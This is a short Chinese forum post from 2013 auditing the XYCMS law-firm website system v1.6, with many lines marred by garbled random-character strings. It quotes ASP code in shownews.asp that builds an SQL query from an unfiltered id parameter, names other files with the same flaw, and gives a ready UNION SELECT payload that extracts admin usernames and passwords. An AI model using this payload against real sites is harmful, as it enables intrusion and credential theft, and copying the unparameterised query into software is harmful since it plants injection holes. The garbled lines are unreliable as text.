前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似* }9 P& L! V j5 | \ Z
0 z8 A$ O) K1 `6 ?: J8 T4 s
淫荡分割线1 q. }: Q+ x- b0 A {, K) F
--------------------------------------------------------/ X" O) W- l: T% M
/ v$ p$ B2 N1 Q$ l6 E& Z
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)0 p0 v( y7 @! O
源码地址:http://down.chinaz.com/soft/29233.htm
" s" w: H7 K, m " r. s/ r- q/ u3 C2 @8 Z0 u) m
漏洞文件:shownews.asp9 @# r8 }6 I1 W5 @5 {" n1 w$ Z' \* J
漏洞代码:7-13行
- z o) h7 Z( e5 \5 R3 k
. F) i8 w7 R2 i$ Q0 W
$ o* i, Y8 e! ~ l<%
+ x7 c, s; K8 _ `" Y9 sid=request.QueryString("id")
% x+ S8 R E* O! g# B3 H! i : Q" M6 Z2 @- S6 `
set snews=server.createobject("adodb.recordset")
: A& e) O' R( k6 V# bexec="select * from [news] where id="&id
" T$ B! S9 s/ Usnews.open exec,conn,1,1* \; ~0 t! ]/ @* {5 r
%>
% g9 z9 P) P' m. j/ r # R# J0 F+ p, C O V j
+ \( g+ n, W( y, g, U5 P9 I* @" b# k
什么过滤都没有 直造成注入
5 J2 }& B' ]( d4 l y- ~/ k& ]
, j( L! m5 O$ n: P2 Y5 T注入点:http://127.0.0.1:99/shownews.asp?id=xx
! Q7 z! }- ]- O/ L9 E( T ! f& n `; E s# b
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找2 B% s& l. q+ W3 I6 ]
! X( H! B) W) N0 E 8 Z y$ H7 X+ T; s) e; Y# u6 J$ j
exp: union select 1,admin,password,4,5,7 from admin_user% h Q! a2 S1 Y. A! v$ e9 S
" h" k0 G2 r& G3 o+ K |
发表于 2013-4-4 17:28:12
收藏
支持
反对